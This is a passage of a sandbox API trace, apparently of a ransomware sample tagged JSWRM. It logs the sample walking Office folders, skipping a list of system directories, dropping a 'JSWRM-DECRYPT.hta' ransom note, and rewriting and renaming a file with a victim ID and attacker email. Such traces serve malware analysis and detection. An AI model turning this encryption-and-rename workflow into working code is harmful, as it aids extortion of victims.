hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.469] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.469] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0126.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0126.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0126.469] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0126.469] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0126.469] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0126.469] lstrcmpiW (lpString1="et", lpString2="...") returned 1 [0126.469] lstrcmpiW (lpString1="et", lpString2="windows") returned -1 [0126.469] lstrcmpiW (lpString1="et", lpString2="recovery") returned -1 [0126.469] lstrcmpiW (lpString1="et", lpString2="perflogs") returned -1 [0126.469] lstrcmpiW (lpString1="et", lpString2="documents and settings") returned 1 [0126.469] lstrcmpiW (lpString1="et", lpString2="$RECYCLE.BIN") returned 1 [0126.469] lstrcmpiW (lpString1="et", lpString2="system volume information") returned -1 [0126.470] lstrcmpiW (lpString1="et", lpString2="msocache") returned -1 [0126.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0126.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0126.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0126.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0126.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0126.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0126.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\jswrm-decrypt.hta")) returned 0xffffffff [0126.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0126.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0126.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0126.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0126.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0126.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.478] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.479] CloseHandle (hObject=0x314) returned 1 [0126.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0126.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0126.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0126.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0126.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0126.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0126.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0126.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0126.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\jswrm-decrypt.hta")) returned 0x20 [0126.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0126.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0126.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0126.479] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x420bc8ff, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0126.480] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.480] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x420bc8ff, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.480] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.480] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.480] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x420bc8ff, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x420bc8ff, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x420bc8ff, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.480] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0126.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0126.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0126.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0126.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0126.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0126.481] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1072, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.481] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0126.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241290, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0126.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.483] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4210) returned 1 [0126.484] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1070) returned 0x278330 [0126.484] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1070, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1070, lpOverlapped=0x0) returned 1 [0126.486] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.486] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1070, lpOverlapped=0x0) returned 1 [0126.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.486] CloseHandle (hObject=0x338) returned 1 [0126.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0126.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0126.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0126.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0126.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.486] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0126.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.488] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.488] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0126.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0126.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0126.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0126.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e9d0 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.489] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6296213, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38ad0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.489] lstrcmpiW 